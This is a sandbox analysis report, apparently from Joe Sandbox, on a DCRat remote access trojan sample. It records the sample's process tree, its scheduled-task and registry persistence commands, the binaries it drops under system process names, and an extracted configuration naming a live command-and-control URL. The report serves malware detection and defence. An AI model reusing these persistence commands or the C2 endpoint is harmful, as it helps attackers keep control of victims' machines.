Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SPISOK_DENEG.exe

Overview

General Information

Sample name:SPISOK_DENEG.exe
Analysis ID:1590008
MD5:490aa1e56fab47858d780a9fdbafb5bf
SHA1:337d8c93caf41a62f0720ae1f0c02d262ac0a274
SHA256:595fab3363e5c90ecf3f7375a0b82d996c96b6a0307ad31e6d79dde07eeb8595
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SPISOK_DENEG.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\SPISOK_DENEG.exe" MD5: 490AA1E56FAB47858D780A9FDBAFB5BF)
    • wscript.exe (PID: 7620 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ChainPortsurrogate.exe (PID: 7768 cmdline: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
          • schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7876 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 6 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 7980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 8024 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8048 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • Conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 8072 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8168 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6456 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7264 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5764 cmdline: schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 12 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7360 cmdline: schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZ" /sc ONLOGON /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3736 cmdline: schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 8 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • Conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 1780 cmdline: schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 14 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 2188 cmdline: schtasks.exe /create /tn "ChainPortsurrogate" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5472 cmdline: schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 10 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 1748 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7616 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7376 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • ChainPortsurrogate.exe (PID: 2596 cmdline: "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
        • Conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ctfmon.exe (PID: 7884 cmdline: C:\ProviderserverruntimeperfSvc\ctfmon.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • ctfmon.exe (PID: 2196 cmdline: C:\ProviderserverruntimeperfSvc\ctfmon.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • dllhost.exe (PID: 5496 cmdline: "C:\Users\Default User\Documents\dllhost.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • dllhost.exe (PID: 1804 cmdline: "C:\Users\Default User\Documents\dllhost.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • EbnrVuXczrPqjyiJGoZ.exe (PID: 4180 cmdline: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • EbnrVuXczrPqjyiJGoZ.exe (PID: 4504 cmdline: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • explorer.exe (PID: 1740 cmdline: "C:\Program Files (x86)\jdownloader\config\explorer.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • explorer.exe (PID: 5568 cmdline: "C:\Program Files (x86)\jdownloader\config\explorer.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • ChainPortsurrogate.exe (PID: 7736 cmdline: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • ChainPortsurrogate.exe (PID: 7644 cmdline: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-NVL90ijyTJenukKzbFMD", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SPISOK_DENEG.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProviderserverruntimeperfSvc\ctfmon.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Windows\debug\backgroundTaskHost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Users\Default\Documents\dllhost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Click to see the 1 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: SPISOK_DENEG.exe PID: 7576JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Click to see the 1 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.3.SPISOK_DENEG.exe.679d6f4.0.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          0.3.SPISOK_DENEG.exe.70a16f4.1.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                            0.3.SPISOK_DENEG.exe.679d6f4.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                              4.0.ChainPortsurrogate.exe.ea0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                                0.3.SPISOK_DENEG.exe.70a16f4.1.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Execution from Suspicious Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Documents\dllhost.exe", CommandLine: "C:\Users\Default User\Documents\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\dllhost.exe, NewProcessName: C:\Users\Default\Documents\dllhost.exe, OriginalFileName: C:\Users\Default\Documents\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\dllhost.exe", ProcessId: 5496, ProcessName: dllhost.exe
                                  Sigma detected: Files With System Process Name In Unsuspected Locations
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetFilename: C:\Windows\debug\backgroundTaskHost.exe
                                  Sigma detected: System File Execution Location Anomaly
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\Default User\Documents\dllhost.exe", CommandLine: "C:\Users\Default User\Documents\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\dllhost.exe, NewProcessName: C:\Users\Default\Documents\dllhost.exe, OriginalFileName: C:\Users\Default\Documents\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\dllhost.exe", ProcessId: 5496, ProcessName: dllhost.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProviderserverruntimeperfSvc\ctfmon.exe", EventID: 13, EventType: SetValue, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon
                                  Sigma detected: CurrentVersion NT Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\ProviderserverruntimeperfSvc\ctfmon.exe", EventID: 13, EventType: SetValue, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe", ParentImage: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ParentProcessId: 7768, ParentProcessName: ChainPortsurrogate.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", ProcessId: 7912, ProcessName: csc.exe
                                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\SPISOK_DENEG.exe", ParentImage: C:\Users\user\Desktop\SPISOK_DENEG.exe, ParentProcessId: 7576, ParentProcessName: SPISOK_DENEG.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" , ProcessId: 7620, ProcessName: wscript.exe
                                  Sigma detected: Dynamic CSharp Compile Artefact
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline

                                  Data Obfuscation

                                  barindex
                                  Sigma detected: Dot net compiler compiles file from suspicious location
                                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe", ParentImage: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ParentProcessId: 7768, ParentProcessName: ChainPortsurrogate.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", ProcessId: 7912, ProcessName: csc.exe

                                  Persistence and Installation Behavior

                                  barindex
                                  Sigma detected: Schedule system process
                                  Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f, CommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe", ParentImage: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ParentProcessId: 7768, ParentProcessName: ChainPortsurrogate.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f, ProcessId: 8096, ProcessName: schtasks.exe

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-13T13:26:33.309955+010020480951A Network Trojan was detected192.168.2.449736104.21.16.180TCP
                                  2025-01-13T13:26:44.466245+010020480951A Network Trojan was detected192.168.2.449738104.21.16.180TCP
                                  2025-01-13T13:26:49.310116+010020480951A Network Trojan was detected192.168.2.449739104.21.16.180TCP
                                  2025-01-13T13:26:52.200683+010020480951A Network Trojan was detected192.168.2.449740104.21.16.180TCP
                                  2025-01-13T13:26:55.607858+010020480951A Network Trojan was detected192.168.2.449741104.21.16.180TCP
                                  2025-01-13T13:27:13.763281+010020480951A Network Trojan was detected192.168.2.449827104.21.16.180TCP
                                  2025-01-13T13:27:21.935238+010020480951A Network Trojan was detected192.168.2.449880104.21.16.180TCP
                                  2025-01-13T13:27:24.482302+010020480951A Network Trojan was detected192.168.2.449897104.21.16.180TCP
                                  2025-01-13T13:27:28.654062+010020480951A Network Trojan was detected192.168.2.449926104.21.16.180TCP
                                  2025-01-13T13:27:46.201101+010020480951A Network Trojan was detected192.168.2.450012104.21.16.180TCP
                                  2025-01-13T13:27:54.216801+010020480951A Network Trojan was detected192.168.2.450013104.21.16.180TCP
                                  2025-01-13T13:27:56.763749+010020480951A Network Trojan was detected192.168.2.450014104.21.16.180TCP
                                  2025-01-13T13:28:02.748384+010020480951A Network Trojan was detected192.168.2.450015104.21.16.180TCP
                                  2025-01-13T13:28:05.513787+010020480951A Network Trojan was detected192.168.2.450016104.21.16.180TCP
                                  2025-01-13T13:28:07.654435+010020480951A Network Trojan was detected192.168.2.450017104.21.16.180TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus / Scanner detection for submitted sample
                                  Source: SPISOK_DENEG.exeAvira: detected
                                  Antivirus detection for dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\Windows\debug\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\Default\Documents\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\Desktop\UxRLAXDP.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Users\user\Desktop\CqAggkYA.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Found malware configuration
                                  Source: 4.0.ChainPortsurrogate.exe.ea0000.0.unpackMalware Configuration Extractor: DCRat {"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-NVL90ijyTJenukKzbFMD", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeReversingLabs: Detection: 78%
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeReversingLabs: Detection: 78%
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeReversingLabs: Detection: 78%
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeReversingLabs: Detection: 78%
                                  Source: C:\Users\Default\Documents\dllhost.exeReversingLabs: Detection: 78%
                                  Source: C:\Users\user\Desktop\CqAggkYA.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\UxRLAXDP.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\YsSdHCtI.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\jYNBNfNl.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\tHgRxHTS.logReversingLabs: Detection: 29%
                                  Source: C:\Windows\debug\backgroundTaskHost.exeReversingLabs: Detection: 78%
                                  Multi AV Scanner detection for submitted file
                                  Source: SPISOK_DENEG.exeVirustotal: Detection: 58%Perma Link
                                  Source: SPISOK_DENEG.exeReversingLabs: Detection: 73%
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.7% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeJoe Sandbox ML: detected
                                  Source: C:\Windows\debug\backgroundTaskHost.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\tHgRxHTS.logJoe Sandbox ML: detected
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeJoe Sandbox ML: detected
                                  Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                  Source: C:\Users\Default\Documents\dllhost.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\UxRLAXDP.logJoe Sandbox ML: detected
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeJoe Sandbox ML: detected
                                  Machine Learning detection for sample
                                  Source: SPISOK_DENEG.exeJoe Sandbox ML: detected
                                  Sample uses string decryption to hide its real strings
